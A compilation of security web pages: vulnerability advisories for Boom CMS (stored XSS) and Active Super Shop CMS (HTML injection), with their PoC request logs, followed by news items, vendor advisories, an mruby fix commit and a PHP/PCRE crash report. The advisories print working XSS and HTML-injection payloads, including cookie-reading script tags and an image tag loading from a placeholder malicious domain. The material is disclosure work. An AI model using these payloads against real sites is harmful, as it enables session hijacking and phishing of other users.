Sippts is a set of tools to audit VoIP servers and devices using SIP protocol. It is programmed in Python script and it allows us to check the security of a VoIP server using SIP protocol, over UDP, TCP and TLS protocols.

SIPPTS 4.0

Boom CMS version 8.0.7 suffers from a cross site scripting vulnerability.

    Document Title:===============Boom CMS v8.0.7 - Cross Site Scripting VulnerabilityReferences (Source):====================https://www.vulnerability-lab.com/get_content.php?id=2274Release Date:=============2023-07-03Vulnerability Laboratory ID (VL-ID):====================================2274Common Vulnerability Scoring System:====================================5.3Vulnerability Class:====================Cross Site Scripting - PersistentCurrent Estimated Price:========================500€ - 1.000€Product & Service Introduction:===============================Boom is a fully featured, easy to use CMS. More than 10 years, and many versions later, Boom is an intuitive, WYSIWYG CMS that makes lifeeasy for content editors and website managers. Working with BoomCMS is simple. It's easy and quick to learn and start creating content.It gives editors control but doesn't require any technical knowledge.(Copy of the Homepage:https://www.boomcms.net/boom-boom  )Abstract Advisory Information:==============================The vulnerability laboratory core research team discovered a persistent cross site vulnerability in the Boom CMS v8.0.7 web-application.Affected Product(s):====================UXB LondonProduct: Boom v8.0.7 - Content Management System (Web-Application)Vulnerability Disclosure Timeline:==================================2022-07-24: Researcher Notification & Coordination (Security Researcher)2022-07-25: Vendor Notification (Security Department)2023-**-**: Vendor Response/Feedback (Security Department)2023-**-**: Vendor Fix/Patch (Service Developer Team)2023-**-**: Security Acknowledgements (Security Department)2023-07-03: Public Disclosure (Vulnerability Laboratory)Discovery Status:=================PublishedExploitation Technique:=======================RemoteSeverity Level:===============MediumAuthentication Type:====================Restricted Authentication (User Privileges)User Interaction:=================Low User InteractionDisclosure Type:================Responsible DisclosureTechnical Details & Description:================================A persistent script code injection web vulnerability has been discovered in the official Boom CMS v8.0.7 web-application.The vulnerability allows remote attackers to inject own malicious script codes with persistent attack vector to compromisebrowser to web-application requests from the application-side.The vulnerability is located in the input fields of the album title and album description in the asset-manager module.Attackers with low privileges are able to add own malformed albums with malicious script code in the title and description.After the inject the albums are being displayed in the backend were the execute takes place on preview of the main assets.The attack vector of the vulnerability is persistent and the request method to inject is post. The validation tries to parsethe content by usage of a backslash. Thus does not have any impact to inject own maliciousjava-scripts because of its only performed for double- and single-quotes to prevent sql injections.Successful exploitation of the vulnerability results in session hijacking, persistent phishing attacks, persistentexternal redirects to malicious source and persistent manipulation of affected application modules.Request Method(s):[+] POSTVulnerable Module(s):[+] assets-manager (album)Vulnerable Function(s):[+] addVulnerable Parameter(s):[+] title[+] descriptionAffected Module(s):[+] Frontend (Albums)[+] Backend (Albums Assets)Proof of Concept (PoC):=======================The persistent input validation web vulnerability can be exploited by remote attackers with low privileged user account and with low user interaction.For security demonstration or to reproduce the persistent cross site web vulnerability follow the provided information and steps below to continue.Manual steps to reproduce the vulnerability ...1. Login to the application as restricted user2. Create a new album3. Inject a test script code payload to title and description4. Save the request5. Preview frontend (albums) and backend (assets-manager & albums listing) to provoke the execution6. Successful reproduce of the persistent cross site web vulnerability!Payload(s):><script>alert(document.cookie)</script><div style=1<a onmouseover=alert(document.cookie)>test</a>--- PoC Session Logs (Inject) ---https://localhost:8000/boomcms/album/35Host: localhost:8000User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:90.0) Gecko/20100101 Firefox/90.0Accept: application/json, text/javascript, */*; q=0.01Content-Type: application/jsonX-Requested-With: XMLHttpRequestContent-Length: 263Origin:https://localhost:8000Connection: keep-aliveReferer:https://localhost:8000/boomcms/asset-manager/albums/[evil.source]Sec-Fetch-Site: same-origin{"asset_count":1,"id":35,"name":""><[INJECTED SCRIPT CODE PAYLOAD 1!]>","description":""><[INJECTED SCRIPT CODE PAYLOAD 2!]>","slug":"a","order":null,"site_id":1,"feature_image_id":401,"created_by":9,"deleted_by":null,"deleted_at":null,"created_at":"2021-xx-xx xx:x:x","updated_at":"2021-xx-xx xx:x:x"}-PUT: HTTP/1.1 200 OKServer: ApacheCache-Control: no-cache, privateSet-Cookie: Max-Age=7200; path=/Cookie: laravel_session=eyJpdiI6ImVqSkTEJzQjlRPT0iLCJ2YWx1ZSI6IkxrdUZNWUFVV1endrZk1TWkxxdnErTUFDY2pBS0JSYTVFakppRnNub1kwSkF6amQTYiLCJtYyOTUyZTk3MjhlNzk1YWUzZWQ5NjNhNmRkZmNlMTk0NzQ5ZmQ2ZDAyZTED;Max-Age=7200; path=/; httponlyContent-Length: 242Connection: Keep-AliveContent-Type: application/json-https://localhost:8000/boomcms/asset-manager/albums/[evil.source]Host: localhost:8000User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:90.0) Gecko/20100101 Firefox/90.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Accept-Language: de,en-US;q=0.7,en;q=0.3Accept-Encoding: gzip, deflate, brConnection: keep-aliveCookie: laravel_session=eyJpdiI6ImVqSkTEJzQjlRPT0iLCJ2YWx1ZSI6IkxrdUZNWUFVV1endrZk1TWkxxdnErTUFDY2pBS0JSYTVFakppRnNub1kwSkF6amQTYiLCJtYyOTUyZTk3MjhlNzk1YWUzZWQ5NjNhNmRkZmNlMTk0NzQ5ZmQ2ZDAyZTED;-GET: HTTP/1.1 200 OKServer: ApacheCache-Control: no-cache, privateSet-Cookie:Vary: Accept-EncodingContent-Length: 7866Connection: Keep-AliveContent-Type: text/html; charset=UTF-8-Vulnerable Source: asset-manager/albums/[ID]<li data-album="36">         <a href="#albums/20">             <div>                 <h3>[MALICIOUS INJECTED SCRIPT CODE PAYLOAD 1!]</h3>                 <p class="description">"><[MALICIOUS INJECTED SCRIPT CODE PAYLOAD 2!]></p>                 <p class='count'><span>0</span> assets</p>             </div>         </a>     </li></iframe></p></div></a></li></ul></div></div>         </div>         <div id="b-assets-view-asset-container"></div>         <div id="b-assets-view-selection-container"></div>         <div id="b-assets-view-album-container"><div><div id="b-assets-view-album">         <div class="heading">             <h1 class="bigger b-editable" contenteditable="true"><[MALICIOUS INJECTED SCRIPT CODE PAYLOAD 1!]></h1>             <p class="description b-editable" contenteditable="true"><[MALICIOUS INJECTED SCRIPT CODE PAYLOAD 2!]></p>         </div>Solution - Fix & Patch:=======================The vulnerability can be patched by a secure parse and encode of the vulnerable title and description parameters.Restrict the input fields and disallow usage of special chars. Sanitize the output listing location to prevent further attacks.Security Risk:==============The security risk of the persistent input validation web vulnerability in the application is estimated as medium.Credits & Authors:==================Vulnerability-Lab [Research Team] -https://www.vulnerability-lab.com/show.php?user=Vulnerability-LabDisclaimer & Information:=========================The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties,either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Labor its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profitsor special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states donot allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply.We do not approve or encourage anybody to break any licenses, policies, deface websites, hack into databases or trade with stolen data.Domains:www.vulnerability-lab.com    www.vuln-lab.com        www.vulnerability-db.comAny modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory.Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of othermedia, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and otherinformation on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list, modify, use oredit our material contact (admin@ or research@) to get a ask permission.            Copyright © 2023 | Vulnerability Laboratory - [Evolution Security GmbH]™-- VULNERABILITY LABORATORY (VULNERABILITY LAB)RESEARCH, BUG BOUNTY & RESPONSIBLE DISCLOSURE

Boom CMS 8.0.7 Cross Site Scripting

Active Super Shop CMS version 2.5 suffers from an html injection vulnerability.

Document Title:  
===============  
Active Super Shop CMS v2.5 - HTML Injection Vulnerabilities

References (Source):  
====================  
https://www.vulnerability-lab.com/get_content.php?id=2278

Release Date:  
=============  
2023-07-04

Vulnerability Laboratory ID (VL-ID):  
====================================  
2278

Common Vulnerability Scoring System:  
====================================  
5.4

Vulnerability Class:  
====================  
Script Code Injection

Current Estimated Price:  
========================  
500€ - 1.000€

Product & Service Introduction:  
===============================  
https://codecanyon.net/item/active-super-shop-multivendor-cms/12124432

Abstract Advisory Information:  
==============================  
The vulnerability laboratory core research team discovered multiple html injection vulnerabilities in the Active Super Shop Multi-vendor CMS v2.5 web-application.

Affected Product(s):  
====================  
ActiveITzone  
Product: Active Super Shop CMS v2.5 (CMS) (Web-Application)

Vulnerability Disclosure Timeline:  
==================================  
2021-08-20: Researcher Notification & Coordination (Security Researcher)  
2021-08-21: Vendor Notification (Security Department)  
2021-**-**: Vendor Response/Feedback (Security Department)  
2021-**-**: Vendor Fix/Patch (Service Developer Team)  
2021-**-**: Security Acknowledgements (Security Department)  
2023-07-05: Public Disclosure (Vulnerability Laboratory)

Discovery Status:  
=================  
Published

Exploitation Technique:  
=======================  
Remote

Severity Level:  
===============  
Medium

Authentication Type:  
====================  
Restricted Authentication (User Privileges)

User Interaction:  
=================  
Low User Interaction

Disclosure Type:  
================  
Responsible Disclosure

Technical Details & Description:  
================================  
Multiple html injection web vulnerabilities has been discovered in the official Active Super Shop Multi-vendor CMS v2.5 web-application.  
The web vulnerability allows remote attackers to inject own html codes with persistent vector to manipulate application content.

The persistent html injection web vulnerabilities are located in the name, phone and address parameters of the manage profile and products branding module.  
Remote attackers with privileged accountant access are able to inject own malicious script code in the name parameter to provoke a persistent execution on  
profile view or products preview listing. There are 3 different privileges that are allowed to access the backend like the accountant (low privileges), the  
manager (medium privileges) or the admin (high privileges). Accountants are able to attack the higher privileged access roles of admins and manager on preview  
of the elements in the backend to compromise the application. The request method to inject is post and the attack vector is persistent located on the application-side.

Successful exploitation of the vulnerabilities results in session hijacking, persistent phishing attacks, persistent external redirects to malicious source and  
persistent manipulation of affected application modules.

Request Method(s):  
[+] POST

Vulnerable Module(s):  
[+] Manage Details

Vulnerable Parameter(s):  
[+] name  
[+] phone  
[+] address

Affected Module(s):  
[+] manage profile  
[+] products branding

Proof of Concept (PoC):  
=======================  
The html injection web vulnerabilities can be exploited by remote attackers with privileged accountant access and with low user interaction.  
For security demonstration or to reproduce the persistent cross site web vulnerability follow the provided information and steps below to continue.

Exploitation: Payload  
<img src="https://[DOMAIN]/[PATH]/[PICTURE].*">

Vulnerable Source: manage_admin & branding  
<div class="tab-pane fade active in" id="" style="border:1px solid #ebebeb; border-radius:4px;">  
<div class="panel-heading">  
<h3 class="panel-title">Manage Details</h3>  
</div>  
<form action="https://assm_cms.localhost:8080/shop/admin/manage_admin/update_profile/"  class="form-horizontal" method="post" accept-charset="utf-8">  
<div class="panel-body">  
<div class="form-group">  
<label class="col-sm-3 control-label" for="demo-hor-1">Name</label>  
<div class="col-sm-6">  
<input type="text" name="name" value="Mr. Accountant"><img src="https://MALICIOUS-DOMAIN.com/gfx/logo-header.png">" id="demo-hor-1" class="form-control required">  
</div></div>  
<div class="form-group">  
<label class="col-sm-3 control-label" for="demo-hor-2">Email</label>  
<div class="col-sm-6">  
<input type="email" name="email" value="accountant@shop.com"  id="demo-hor-2" class="form-control required">  
</div></div>  
<div class="form-group">  
<label class="col-sm-3 control-label" for="demo-hor-3">  
Phone</label>  
<div class="col-sm-6">  
<input type="text" name="phone" value="017"><img src="https://MALICIOUS-DOMAIN.com/gfx/logo-header.png">" id="demo-hor-3" class="form-control">  
</div></div>

--- PoC Session Logs (POST) ---  
https://assm_cms.localhost:8080/shop/admin/manage_admin/update_profile/  
Host: assm_cms.localhost:8080  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0  
Accept: text/html, */*; q=0.01  
X-Requested-With: XMLHttpRequest  
Content-Type: multipart/form-data; boundary=---------------------------280242453224137385302547344680  
Content-Length: 902  
Origin:https://assm_cms.localhost:8080  
Connection: keep-alive  
Referer:https://assm_cms.localhost:8080/shop/admin/manage_admin/  
Cookie: ci_session=5n6fmo5q5gvik6i5hh2b72uonuem9av3; curr=1  
-  
POST: HTTP/3.0 200 OK  
content-type: text/html; charset=UTF-8  
ci_session=5n6fmo5q5gvik6i5hh2b72uonuem9av3; path=/; HttpOnly  
https://assm_cms.localhost:8080/shop/admin/manage_admin/  
Host: assm_cms.localhost:8080  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate, br  
Connection: keep-alive

Reference(s):  
https://assm_cms.localhost:8080/shop/  
https://assm_cms.localhost:8080/shop/admin/  
https://assm_cms.localhost:8080/shop/admin/manage_admin/  
https://assm_cms.localhost:8080/shop/admin/manage_admin/update_profile/

Solution - Fix & Patch:  
=======================  
Disallow inseration of html code for input fields like name, adress and phone. Sanitize the content to secure deliver.

Security Risk:  
==============  
The security risk of the html injection web vulnerabilities in the shopping web-application are estimated as medium.

Credits & Authors:  
==================  
Vulnerability-Lab [Research Team] -https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab

Disclaimer & Information:  
=========================  
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties,  
either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab  
or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits  
or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do  
not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply.  
We do not approve or encourage anybody to break any licenses, policies, deface websites, hack into databases or trade with stolen data.

Domains:www.vulnerability-lab.com    www.vuln-lab.com        www.vulnerability-db.com

Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory.  
Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other  
media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other  
information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list, modify, use or  
edit our material contact (admin@ or research@) to get a ask permission.

            Copyright © 2023 | Vulnerability Laboratory - [Evolution Security GmbH]™

--   
VULNERABILITY LABORATORY (VULNERABILITY LAB)  
RESEARCH, BUG BOUNTY & RESPONSIBLE DISCLOSURE

Active Super Shop CMS 2.5 HTML Injection

Google on Wednesday announced that it's making available passkeys for high-risk users to enroll in its Advanced Protection Program (APP).
"Users traditionally needed a physical security key for APP — now they can choose a passkey to secure their account," Shuvo Chatterjee, product lead of APP, said.
Passkeys are considered a more secure and phishing-resistant alternative to passwords. Based on

Cybersecurity / Phishing Attack

Google on Wednesday announced that it's making available passkeys for high-risk users to enroll in its Advanced Protection Program (APP).

"Users traditionally needed a physical security key for APP — now they can choose a passkey to secure their account," Shuvo Chatterjee, product lead of APP, said.

Passkeys are considered a more secure and phishing-resistant alternative to passwords. Based on the FIDO Authentication standard, the technology is designed to secure online accounts against potential takeover attacks by ditching passwords in favor of biometrics or a PIN.

Passkeys can simultaneously act as a first- and second-factor, entirely obviating the need for a password. Earlier this May, the tech giant revealed that passkeys are being used by over 400 million Google accounts.

High-risk users, who are at an elevated exposure to cyber-attacks because of who they are and what they do (e.g., journalists, elected officials, political campaign staff, human rights workers, and business leaders), can check if they have a compatible device and browser and complete the enrollment process.

"We also require you to add recovery options during enrollment (e.g. a phone number and email, or another passkey or security key), a combination of which will help you regain access to your account if you get locked out," Chatterjee said.

Google further said it's partnering with Internews to provide journalists and human rights workers with security support. The program spans 10 countries, including Brazil, Mexico, and Poland.

The development comes as Google said it intends to expand dark web reports to any user with a Google account starting later this month to check if their information has been leaked on the darknet. The feature was previously limited to Google One subscribers.

"Dark web report will become available to all users with a consumer Google Account," it noted in a support document. "Dark web report is integrated with Results about you as a combined solution to help users protect their online presence."

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Google Adds Passkeys to Advanced Protection Program for High-Risk Users

The US Treasury Department has sanctioned Predator spyware vendor Intellexa Consortium, and banned the company from doing business in the US.

The US Treasury Department has sanctioned Predator spyware vendor Intellexa Consortium, and banned the company from doing business in the US.

Predator can turn infected smartphones into surveillance devices. Intellexa is based in Greece but the Treasury Department imposed the sanctions because of the use of the spyware against Americans, including US government officials, journalists, and policy experts.

Under Secretary of the Treasury for Terrorism and Financial Intelligence Brian E. Nelson said:

> “Today’s actions represent a tangible step forward in discouraging the misuse of commercial surveillance tools, which increasingly present a security risk to the United States and our citizens.”

Since its founding in 2019, the Intellexa Consortium has marketed the Predator label as a suite of tools created by a variety of offensive cybercompanies that enable targeted and mass surveillance campaigns.

Predator is capable of infiltrating a range of electronic devices without any user interaction (known as ‘zero-click’). Once installed, Predator deploys its extensive data-stealing and surveillance capabilities, giving the attacker access to a variety of applications and personal information on the compromised device. The spyware is capable of turning on the user’s microphone and camera, downloading their files without their knowledge, tracking their location, and more.

Under the sanctions, Americans and people who do business with the US are forbidden from transacting with Intellexa, its founder and architect Tal Dilian, employee Sara Hamou and four of the companies affiliated with Intellexa.

Sanctions of this magnitude leveraged against commercial spyware vendors for enabling misuse of their tools are unprecedented, but the US has expressed concerns about commercial spyware vendors before.

> “A growing number of foreign governments around the world, moreover, have deployed this technology to facilitate repression and enable human rights abuses, including to intimidate political opponents and curb dissent, limit freedom of expression, and monitor and target activists and journalists.”

In July 2023, the US Commerce Department’s Bureau of Industry and Security (BIS) added Intellexa and Cytrox AD to the Entity List for trafficking in cyber exploits used to gain access to information systems. Cytrox AD is a North Macedonia-based company within the Intellexa Consortium and acts as a developer of the consortium’s Predator spyware.

The Entity List is a trade control list created and maintained by the US government. It identifies foreign individuals, organizations, companies, and government entities that are subject to specific export controls and restrictions due to their involvement in activities that threaten US national security or foreign policy interests.

Earlier this month, a California federal judge ordered spyware maker NSO Group to hand over the code for Pegasus and other spyware products used to spy on WhatsApp users.

While you’ll see Predator and Pegasus usually deployed in small-scale and targeted attacks, putting a stop to the development and deployment of spyware by these commercial entities is good news for everyone.

**How to remove spyware**

Because spyware apps install under a different name and hide themselves from the user, it can be hard to find and remove them. That is where Malwarebytes for Android can help you.

1.  Open Malwarebytes for Android and navigate to the dashboard
2.  Tap **Scan** **now**
3.  It may take a few minutes to scan your device, but it will tell you if it finds spyware or any other nasties.
4.  You can then uninstall the app.

**We don’t just report on phone security—we provide it**

Cybersecurity risks should never spread beyond a headline. Keep threats off your mobile devices by downloading Malwarebytes for iOS, and Malwarebytes for Android today.

 Predator spyware vendor banned in US 

An issue was discovered in Joomla! 2.5.0 through 3.10.6 & 4.0.0 through 4.1.0. Inadequate validation of URLs could result into an invalid check whether an redirect URL is internal or not.

*   **Project:** Joomla!
*   **SubProject:** CMS
*   **Impact:** Low
*   **Severity:** Low
*   **Probability:** Low
*   **Versions:** 2.5.0 - 3.10.6 & 4.0.0 - 4.1.0
*   **Exploit type:** Open redirect
*   **Reported Date:** 2021-03-23
*   **Fixed Date:** 2022-03-29
*   **CVE Number:** CVE-2022-23798

**Description**

Inadequate validation of URLs could result into an invalid check whether an redirect URL is internal or not.

**Affected Installs**

Joomla! CMS versions 2.5.0 - 3.10.6 & 4.0.0 - 4.1.0

**Solution**

Upgrade to version 3.10.7 & 4.1.1

**Contact**

The JSST at the Joomla! Security Centre.

**Reported By:** Loïc LE MÉTAYER

CVE-2022-23798: Joomla! Developer Network

Out-of-bounds Read in Homebrew mruby prior to 3.2.

Permalink

Browse files

vm.c: should check type before hash access.

Since the operand of double splat (\`\*\*\`) may not be a hash, simple
assertion (previous code since d42a64e) was not enough for this case.

*   Loading branch information

![@matz](https://avatars.githubusercontent.com/u/30733?s=40&v=4)

matz committed

Feb 15, 2022

1 parent ecb28f4 commit ff3a5ebed6ffbe3e70481531cfb969b497aa73ad

Showing with **1 addition** and **1 deletion**.

1.  +1 −1 src/vm.c

@@ -2766,7 +2766,7 @@ mrb\_vm\_exec(mrb\_state \*mrb, const struct RProc \*proc, const mrb\_code \*pc)

int lim = a+b\*2+1;

  

hash = regs\[a\];

mrb\_assert(mrb\_hash\_p(hash));

mrb\_ensure\_hash\_type(mrb, hash);

for (i=a+1; i<lim; i+=2) {

mrb\_hash\_set(mrb, hash, regs\[i\], regs\[i+1\]);

}

**0 comments on commit `ff3a5eb`**

Please sign in to comment.

CVE-2022-0630: vm.c: should check type before hash access. · mruby/mruby@ff3a5eb

VMware ESXi contains a TOCTOU (Time-of-check Time-of-use) vulnerability that exists in the way temporary files are handled. A malicious actor with access to settingsd, may exploit this issue to escalate their privileges by writing arbitrary files.

Advisory ID: VMSA-2022-0004

CVSSv3 Range: 5.3-8.4

Issue Date: 2022-02-15

Updated On: 2022-02-15 (Initial Advisory)

CVE(s): CVE-2021-22040, CVE-2021-22041, CVE-2021-22042, CVE-2021-22043, CVE-2021-22050

Synopsis: VMware ESXi, Workstation, and Fusion updates address multiple security vulnerabilities (CVE-2021-22040, CVE-2021-22041, CVE-2021-22042, CVE-2021-22043, CVE-2021-22050)

Share this page on social media

Sign up for Security Advisories

****1\. Impacted Products****

*   VMware ESXi
*   VMware Workstation Pro / Player (Workstation)
*   VMware Fusion Pro / Fusion (Fusion)
*   VMware Cloud Foundation (Cloud Foundation)  
    

****2\. Introduction****

Multiple vulnerabilities in VMware ESXi, Workstation, and Fusion were privately reported to VMware. Updates are available to remediate these vulnerabilities in affected VMware products. 

The individual vulnerabilities documented on this VMSA have severity Important/Moderate but combining these issues may result in higher severity, hence the severity of this VMSA is at severity level Critical.

****3a. Use-after-free vulnerability in XHCI USB controller (CVE-2021-22040)****

VMware ESXi, Workstation, and Fusion contain a use-after-free vulnerability in the XHCI USB controller.VMware has evaluated the severity of this issue to be in the Important severity range with a maximum CVSSv3 base score of 8.4.

A malicious actor with local administrative privileges on a virtual machine may exploit this issue to execute code as the virtual machine's VMX process running on the host.  

To remediate CVE-2021-22040 apply the patches listed in the 'Fixed Version' column of the 'Response Matrix' found below.  

Workarounds for CVE-2021-22040 have been listed in the 'Workarounds' column of the 'Response Matrix' below.  

VMware would like to thank Wei of Kunlun Lab working with the 2021 Tianfu Cup Pwn Contest for reporting this issue to us.  

****3b. Double-fetch vulnerability in UHCI USB controller (CVE-2021-22041)****

VMware ESXi, Workstation, and Fusion contain a double-fetch vulnerability in the UHCI USB controller. VMware has evaluated the severity of this issue to be in the Important severity range with a maximum CVSSv3 base score of 8.4.  

A malicious actor with local administrative privileges on a virtual machine may exploit this issue to execute code as the virtual machine's VMX process running on the host.  

To remediate CVE-2021-22041 apply the patches listed in the 'Fixed Version' column of the 'Response Matrix' found below.  

Workarounds for CVE-2021-22041 have been listed in the 'Workarounds' column of the 'Response Matrix' below.  

Successful exploitation of this issue requires an isochronous USB endpoint to be made available to the virtual machine.

**\[1\]** VMware recommends taking ESXi670-202201001 released on January 25, 2022 over ESXi670-202111101-SG released on November 23, 2021 since ESXi670-202201001 also resolves non-security related issues (documented in https://docs.vmware.com/en/VMware-vSphere/6.7/rn/esxi670-202201001.html).  

VMware would like to thank VictorV of Kunlun Lab working with the 2021 Tianfu Cup Pwn Contest for reporting this issue to us.  

**Response Matrix: - 3a & 3b**

**Impacted Product Suites that Deploy Response Matrix 3a & 3b Components:**

Product

Version

Running On

CVE Identifier

CVSSv3

Severity

Fixed Version

Workarounds

Additional Documentation

Cloud Foundation (ESXi)

4.x

Any

CVE-2021-22040, CVE-2021-22041

8.4

important

KB87646 (4.4)

KB87349

FAQ

Cloud Foundation (ESXi)

3.x

Any

CVE-2021-22040, CVE-2021-22041

8.4

important

3.11

KB87349

FAQ

****3c. ESXi settingsd unauthorized access vulnerability (CVE-2021-22042)****

VMware ESXi contains an unauthorized access vulnerability due to VMX having access to settingsd authorization tickets. VMware has evaluated the severity of this issue to be in the Important severity range with a maximum CVSSv3 base score of 8.2.  

A malicious actor with privileges within the VMX process only, may be able to access settingsd service running as a high privileged user. 

To remediate CVE-2021-22042 apply the patches listed in the 'Fixed Version' column of the 'Response Matrix' found below.  

VMware would like to thank Wei of Kunlun Lab working with the 2021 Tianfu Cup Pwn Contest for reporting this issue to us.  

****3d. ESXi settingsd TOCTOU vulnerability (CVE-2021-22043)****

VMware ESXi contains a TOCTOU (Time-of-check Time-of-use) vulnerability that exists in the way temporary files are handled. VMware has evaluated the severity of this issue to be in the Important severity range with a maximum CVSSv3 base score of 8.2.  

A malicious actor with access to settingsd, may exploit this issue to escalate their privileges by writing arbitrary files.   

To remediate CVE-2021-22043 apply the patches listed in the 'Fixed Version' column of the 'Response Matrix' found below.  

VMware would like to thank Wei of Kunlun Lab working with the 2021 Tianfu Cup Pwn Contest for reporting this issue to us.  

**Response Matrix: - 3c & 3d**

Product

Version

Running On

CVE Identifier

CVSSv3

Severity

Fixed Version

Workarounds

Additional Documentation

ESXi

7.0 U3

Any

CVE-2021-22042, CVE-2021-22043

8.2

important

ESXi70U3c-19193900

None

FAQ

ESXi

7.0 U2

Any

CVE-2021-22042, CVE-2021-22043

8.2

important

ESXi70U2e-19290878

None

FAQ

ESXi

7.0 U1

Any

CVE-2021-22042, CVE-2021-22043

8.2

important

ESXi70U1e-19324898

None

FAQ

ESXi

6.7

Any

CVE-2021-22042, CVE-2021-22043

N/A

N/A

Unaffected

N/A

N/A

ESXi

6.5

Any

CVE-2021-22042, CVE-2021-22043

N/A

N/A

Unaffected

N/A

N/A

**Impacted Product Suites that Deploy Response Matrix 3c & 3d Components:**

Product

Version

Running On

CVE Identifier

CVSSv3

Severity

Fixed Version

Workarounds

Additional Documentation

Cloud Foundation (ESXi)

4.x

Any

CVE-2021-22042, CVE-2021-22043

8.2

important

KB87646 (4.4)

None

FAQ

Cloud Foundation (ESXi)

3.x

Any

CVE-2021-22042, CVE-2021-22043

N/A

N/A

Unaffected

N/A

N/A

****3e. ESXi slow HTTP POST denial of service vulnerability (CVE-2021-22050)****

ESXi contains a slow HTTP POST denial-of-service vulnerability in rhttpproxy. VMware has evaluated the severity of this issue to be in the Moderate severity range with a maximum CVSSv3 base score of 5.3.  

A malicious actor with network access to ESXi may exploit this issue to create a denial-of-service condition by overwhelming rhttpproxy service with multiple requests.  

To remediate CVE-2021-22050 apply the patches listed in the 'Fixed Version' column of the 'Response Matrix' found below.  

VMware would like to thank George Noseevich (@webpentest) and Sergey Gerasimov of SolidLab LLC for reporting this issue to us.  

**Impacted Product Suites that Deploy Response Matrix 3e Components:**

Product

Version

Running On

CVE Identifier

CVSSv3

Severity

Fixed Version

Workarounds

Additional Documentation

Cloud Foundation (ESXi)

4.x

Any

CVE-2021-22050

5.3

moderate

KB87646 (4.4)

None

FAQ

Cloud Foundation (ESXi)

3.x

Any

CVE-2021-22050

5.3

moderate

3.11

None

FAQ

****4\. References****

****5\. Change Log****

**2022-02-15 VMSA-2022-0004**  
Initial security advisory.  

****6\. Contact****

CVE-2021-22043: VMSA-2022-0004

An out-of-bounds read was discovered in PCRE before 10.34 when the pattern \X is JIT compiled and used to match specially crafted subjects in non-UTF mode. Applications that use PCRE to parse untrusted input may be vulnerable to this flaw, which would allow an attacker to crash the application. The flaw occurs in do_extuni_no_utf in pcre2_jit_compile.c.

Sec Bug #78338

Array cross-border reading/global variable coverage in PCRE

Submitted:

2019-07-28 04:17 UTC

Modified:

2019-07-29 22:01 UTC

From:

3556158925 at qq dot com

Assigned:

stas (profile)

Status:

Closed

Package:

PCRE related

PHP Version:

7.3.8

OS:

Ubuntu 18.04.1 LTS

Private report:

No

CVE-ID:

_None_

 **\[2019-07-28 04:17 UTC\] 3556158925 at qq dot com**

Description:
------------
Get the lastest version of PHP:
git clone https://github.com/php/php-src

Configure PHP:
./configure
PCRE is the default extension in PHP, even if use "./configure --disable-all",
you can still trigger the following bugs.

The test script is very easy:
<?php
$fuzz=file\_get\_contents($argv\[1\]);
preg\_match($fuzz,$fuzz);

The input file you can download here:
http://47.104.189.187/input.zip
Unzip this file and use the "input\_file.txt" as input file

Then
./php-src/sapi/cli/php ./test.php ./input\_file.txt
you will see "Segmentation fault (core dumped)"

Use gdb to see the details:
Program received signal SIGSEGV, Segmentation fault.
0x0000555555710367 in do\_extuni\_no\_utf (args=0x7fffffffa110, 
    cc=0x7ffff3a58868 "\\377\\066\\250\\250\\250\\066\\066\\066zzzz=\*\\377/\\n")
    at /home/daige/Desktop/test/php-src/ext/pcre/pcre2lib/pcre2\_jit\_compile.c:8546
8546	lgb = UCD\_GRAPHBREAK(c);

I analyse this crash,it is caused by array cross-border reading, then I use AFL to fuzz PHP,it reports some global variable coverage,you can see the crash cases in "input.zip".

Test script:
---------------
The test script is very easy:
<?php
$fuzz=file\_get\_contents($argv\[1\]);
preg\_match($fuzz,$fuzz);

The input file you can download here:
http://47.104.189.187/input.zip
Unzip this file and use the "input\_file.txt" as input file

Then
./php-src/sapi/cli/php ./test.php ./input\_file.txt
you will see "Segmentation fault (core dumped)"

Actual result:
--------------
Program received signal SIGSEGV, Segmentation fault.
0x0000555555710367 in do\_extuni\_no\_utf (args=0x7fffffffa110, 
    cc=0x7ffff3a58868 "\\377\\066\\250\\250\\250\\066\\066\\066zzzz=\*\\377/\\n")
    at /home/daige/Desktop/test/php-src/ext/pcre/pcre2lib/pcre2\_jit\_compile.c:8546
8546	lgb = UCD\_GRAPHBREAK(c);

**Patches**

Add a Patch

**Pull Requests**

Add a Pull Request

**History**

AllCommentsChangesGit/SVN commitsRelated reports

 **\[2019-07-28 04:21 UTC\] stas@php.net**

This looks like segfault inside PCRE library. Did you report it to the PCRE maintainers?

 **\[2019-07-28 07:22 UTC\] 3556158925 at qq dot com**

I send this report to PRCE maintainer just now, thanks.

 **\[2019-07-29 17:17 UTC\] cmb@php.net**

\-Status: Open +Status: Analyzed \-Assigned To: +Assigned To: stas

